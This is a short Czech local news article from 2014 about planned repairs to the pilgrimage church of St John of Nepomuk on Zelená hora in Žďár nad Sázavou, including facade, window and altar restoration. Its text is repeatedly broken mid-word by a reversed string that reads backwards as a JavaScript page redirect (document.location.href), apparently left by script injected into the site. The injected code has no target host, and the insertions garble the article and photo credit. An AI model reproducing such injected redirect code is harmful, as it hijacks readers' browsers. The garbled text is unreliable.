kostel Zelená hora, propagace
Rainbow page separator

Žďárský poutní kostel čekají do budoucna další opravy

Pondělí, 13. října 2014

Zelená hora

Žďár nad Sázavou / Dokončit obnovu pláště a rekonstrukci oken je do budoucna plánováno v areálu poutního kostela svatého Jana Nepomuckého na Zelené hoře. Ten nedávno převzala do svého majetku a péče církev, konkrétně Biskupství brněnské, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to prostřednictvím žďárské „zámecké“ farnosti.
Po prvotním průzkumu odborníků bylo prokázáno, že obava z napadení krovu prvního ochozu dřevomorkou byla lichá, stejně jako možnost narušení statiky. První ochoz však nebyl ani v minulosti přístupný návštěvníkům, jednak kvůli úzkým schodištím, navíc z důvodu ochrany dochované dlažby.
V interiéru kostela se počítá s restaurací oltáře. Do budoucna není vyloučeno, že vnitřku sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostánku bude navrácen takový vzhled, jaký měl v době svého vzniku, stejně jako [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu před několika lety bylo u baziliky v zámku. Památkáři [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž pomocí sond v kostele na Zelené hoře objevili zdivo původních kleneb.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com/“ target=“_blank“>www.dajc-naturepho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.com